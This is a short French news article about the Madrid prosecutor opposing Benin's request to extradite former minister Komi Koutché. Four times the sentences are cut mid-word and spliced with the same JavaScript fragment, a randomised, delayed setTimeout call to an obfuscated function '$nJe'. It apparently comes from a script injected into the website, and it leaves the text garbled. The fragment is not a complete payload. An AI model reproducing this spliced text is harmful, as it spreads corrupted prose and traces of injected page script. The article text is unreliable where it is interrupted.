Bénin / Espagne : affaire d’extradition de Komi Koutché, ce qu’il faut savoir de la décision du procureur de Madrid

Les dépositions et autres interventions devant le juge de l’audience nationale de Madrid en Espagne devant décider de l’extradition ou non de l’ancien ministre d’Etat béninois sont terminées et mise en délibéré prononcée à une date non communiquée.
Par ailleurs le suspens reste entier même si dans la défense de l’Etat béninois, les avocats béninois n’ont pu changer et convaincre le réquisidom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toire du procureur du tribunal qui s’oppose à la demdom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}ande de l’Etat béninois.

Lors de son réquisidom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toire très acerbe contre la CRIET et le gouvernement béninois, le procureur de la République de l’audience nationale espagnole s’est laissé à une confession. “C’est la première fois depuis 14 ans que nous disons non à une extradition, du fait de la nature bancale du dossier”, a déclaré le procureur pour justifier sa désapprobation de la demdom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}ande d’extradition de l’ancien ministre Komi Koutché
Une telle position ne pouvait que réconforter l’équipe de défense de l’ancien ministre d’Etat Béninois.

Zacky Z.

  • 14
  •  
  •  
  •  
  •  
    14
    Partages
  • 254
    Partages

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

%d blogueurs aiment cette page :